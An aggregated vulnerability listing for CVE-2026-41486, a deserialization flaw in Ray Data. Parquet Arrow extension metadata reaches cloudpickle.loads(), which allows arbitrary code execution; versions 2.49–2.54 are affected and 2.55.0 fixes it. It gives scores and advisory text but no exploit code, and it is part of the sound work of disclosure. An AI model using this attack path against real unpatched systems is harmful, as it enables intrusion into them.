CVE-2026-41486
published 2026-05-08CVE-2026-41486: Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor…
PriorityP351high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EPSS
0.47%
37.4th percentile
Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anyscale | ray | — | — |
| anyscale | ray | >= 2.49.0 < 2.55.0 | 2.55.0 |
| ray-project | ray | — | — |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv4.08.9HIGHCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
ray-project ray up to 2.54.x cloudpickle.loads code injection (GHSA-mw35-8rx3-xf9r)
vuldb·2026-05-09·CVSS 8.9
CVE-2026-41486 [HIGH] ray-project ray up to 2.54.x cloudpickle.loads code injection (GHSA-mw35-8rx3-xf9r)
A vulnerability described as critical has been identified in ray-project ray up to 2.54.x. The impacted element is the function cloudpickle.loads. Such manipulation leads to code injection.
This vulnerability is uniquely identified as CVE-2026-41486. The attack can be launched remotely. No exploit exists.
Upgrading the affected component is recommended.
GHSA
Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization
ghsa·2026-04-24
CVE-2026-41486 [HIGH] CWE-502 Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization
Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization
Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read.
In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://gi
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-05-08
Published